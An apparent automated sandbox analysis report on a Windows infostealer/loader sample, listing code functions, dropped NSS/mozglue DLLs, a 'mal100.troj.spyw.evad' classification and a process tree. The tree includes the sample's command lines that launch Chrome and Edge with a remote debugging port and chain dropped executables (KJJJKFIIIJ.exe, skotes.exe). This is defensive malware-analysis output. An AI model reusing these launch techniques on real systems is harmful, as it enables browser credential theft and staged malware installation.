Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB4E070	0_2_6CB4E070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB001E0	0_2_6CB001E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB76130	0_2_6CB76130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE4130	0_2_6CBE4130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB68140	0_2_6CB68140
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC862C0	0_2_6CC862C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBCE2B0	0_2_6CBCE2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD22A0	0_2_6CBD22A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD8220	0_2_6CBD8220
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBCA210	0_2_6CBCA210
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB88260	0_2_6CB88260
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB98250	0_2_6CB98250
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB5E3B0	0_2_6CB5E3B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB323A0	0_2_6CB323A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB543E0	0_2_6CB543E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB72320	0_2_6CB72320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC1C360	0_2_6CC1C360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC42370	0_2_6CC42370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB02370	0_2_6CB02370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB96370	0_2_6CB96370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB08340	0_2_6CB08340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC3DCD0	0_2_6CC3DCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9FC80	0_2_6CB9FC80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC1CE0	0_2_6CBC1CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB11C30	0_2_6CB11C30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC29C40	0_2_6CC29C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB03C40	0_2_6CB03C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF3D80	0_2_6CAF3D80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC49D90	0_2_6CC49D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD1DC0	0_2_6CBD1DC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB63D00	0_2_6CB63D00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB23EC0	0_2_6CB23EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC85E60	0_2_6CC85E60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC5BE70	0_2_6CC5BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC0DE10	0_2_6CC0DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC1DFC0	0_2_6CC1DFC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC83FC0	0_2_6CC83FC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB21F90	0_2_6CB21F90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBABFF0	0_2_6CBABFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB35F20	0_2_6CB35F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF5F30	0_2_6CAF5F30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC57F20	0_2_6CC57F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC5B8F0	0_2_6CC5B8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDF8F0	0_2_6CBDF8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB0D8E0	0_2_6CB0D8E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB338E0	0_2_6CB338E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9F8C0	0_2_6CB9F8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB5D810	0_2_6CB5D810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD1990	0_2_6CBD1990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB11980	0_2_6CB11980
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB659F0	0_2_6CB659F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB979F0	0_2_6CB979F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB399D0	0_2_6CB399D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB999C0	0_2_6CB999C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB5920	0_2_6CBB5920
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC4F900	0_2_6CC4F900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB7F960	0_2_6CB7F960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBD960	0_2_6CBBD960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDDAB0	0_2_6CBDDAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB01AE0	0_2_6CB01AE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBFDA30	0_2_6CBFDA30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC89A50	0_2_6CC89A50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB3FA10	0_2_6CB3FA10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA1A10	0_2_6CBA1A10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC9BB0	0_2_6CBC9BB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB59BA0	0_2_6CB59BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE5B90	0_2_6CBE5B90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF1B80	0_2_6CAF1B80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB47BF0	0_2_6CB47BF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB4BB20	0_2_6CB4BB20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDFB60	0_2_6CBDFB60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB014E0	0_2_6CB014E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC814A0	0_2_6CC814A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE9430	0_2_6CBE9430
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_009978BB	16_2_009978BB
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_00997049	16_2_00997049
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_00998860	16_2_00998860
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_009931A8	16_2_009931A8
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_00A681D3	16_2_00A681D3
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_00A68101	16_2_00A68101
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_00954B30	16_2_00954B30
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_00954DE0	16_2_00954DE0
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_00992D10	16_2_00992D10
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_0099779B	16_2_0099779B
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_00987F36	16_2_00987F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_00A578BB	17_2_00A578BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_00A58860	17_2_00A58860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_00A57049	17_2_00A57049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_00A531A8	17_2_00A531A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_00A14B30	17_2_00A14B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_00A14DE0	17_2_00A14DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_00A52D10	17_2_00A52D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_00A5779B	17_2_00A5779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_00A47F36	17_2_00A47F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_00A578BB	18_2_00A578BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_00A58860	18_2_00A58860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_00A57049	18_2_00A57049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_00A531A8	18_2_00A531A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_00A14B30	18_2_00A14B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_00A14DE0	18_2_00A14DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_00A52D10	18_2_00A52D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_00A5779B	18_2_00A5779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_00A47F36	18_2_00A47F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A1E530	20_2_00A1E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A36192	20_2_00A36192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A58860	20_2_00A58860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A14B30	20_2_00A14B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A14DE0	20_2_00A14DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A52D10	20_2_00A52D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A30E13	20_2_00A30E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A57049	20_2_00A57049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A531A8	20_2_00A531A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A31602	20_2_00A31602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A5779B	20_2_00A5779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A578BB	20_2_00A578BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A33DF1	20_2_00A33DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A47F36	20_2_00A47F36

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Found potential string decryption / allocating functions

Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: String function: 009680C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00A48E10 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00A2D64E appears 80 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00A2D942 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00A2D663 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00A2DF80 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00A27A00 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00A280C0 appears 392 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CB23620 appears 95 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CC8D930 appears 57 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CC809D0 appears 303 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CC39F30 appears 51 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CB29B10 appears 95 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CC8DAE0 appears 72 times

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000002.2015458484.000000006FE52000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2014762713.000000006CCD5000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: random[1].exe.20.dr	Static PE information: Section: ZLIB complexity 0.997977368772242
Source: random[1].exe.20.dr	Static PE information: Section: kgsecyxg ZLIB complexity 0.9945889506242479
Source: 5762ea743c.exe.20.dr	Static PE information: Section: ZLIB complexity 0.997977368772242
Source: 5762ea743c.exe.20.dr	Static PE information: Section: kgsecyxg ZLIB complexity 0.9945889506242479

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@39/61@9/9

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB60300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

0_2_6CB60300

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\OFRH31K3.htm

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03

Source: C:\Users\user\Documents\KJJJKFIIIJ.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2013954861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2013954861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2013954861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2013954861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, file.exe, 00000000.00000002.2013954861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2013954861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2013954861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1599724140.000000001D405000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738817732.000000001D3F9000.00000004.00000020.00020000.00000000.sdmp, DAEGIDHDHIDGIEBGIJEH.0.dr, EBFHJEGDAFHIJKECFBKJ.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2013954861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2013954861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 47%

Source: file.exe	String found in binary or memory: /addC)
Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe	String found in binary or memory: 6RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeh

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=2084,i,15082746672518523759,5591991654557497421,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2440 --field-trial-handle=2236,i,13354329722629723967,17457331017763836313,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2272,i,9092242746492624172,9017713632823041127,262144 /prefetch:3
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\KJJJKFIIIJ.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\KJJJKFIIIJ.exe "C:\Users\user\Documents\KJJJKFIIIJ.exe"
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe "C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\KJJJKFIIIJ.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=2084,i,15082746672518523759,5591991654557497421,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2440 --field-trial-handle=2236,i,13354329722629723967,17457331017763836313,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe "C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe"	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2272,i,9092242746492624172,9017713632823041127,262144 /prefetch:3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\KJJJKFIIIJ.exe "C:\Users\user\Documents\KJJJKFIIIJ.exe"	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
